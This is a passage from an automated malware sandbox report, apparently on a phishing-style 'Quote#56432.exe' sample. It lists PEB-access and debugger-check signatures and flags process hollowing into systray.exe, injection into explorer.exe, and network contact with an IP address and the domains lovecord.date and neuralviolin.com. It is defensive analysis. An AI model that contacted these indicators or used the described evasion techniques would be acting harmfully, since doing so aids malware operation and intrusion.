          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04651074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04642073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0461C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0461C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045A746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0465740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0465740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0465740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04606C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04606C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04606C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04606C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04654015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04654015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04607016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04607016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04607016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04606CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04606CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04606CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_046414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0461B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0461B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0461B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0461B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0461B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0461B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04658CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04589080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04603884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04603884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045A7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04603540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04658D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0460A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04589100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04589100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04589100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045A4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_046141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04638DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04606DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04606DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04606DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04606DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04606DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04606DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_046069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_046505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_046505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04582D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04582D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04582D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04582D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04582D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045AC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_046051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_046051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_046051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_046051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0463B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0463B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04658A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04597E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04597E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04597E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04597E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04597E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04597E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04614257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045A3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04585210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04585210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04585210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04585210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04598A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0463FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0463FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04658ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04650EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04650EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04650EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_046046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0461FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04658F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04658B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045AF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0465070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0465070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0461FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0461FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04584F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04584F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0464131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_046053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_046053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045ADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04655BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04598794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04591B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Quote#56432.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80
          Source: C:\Windows\explorer.exeDomain query: www.lovecord.date
          Source: C:\Windows\explorer.exeDomain query: www.neuralviolin.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: C70000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
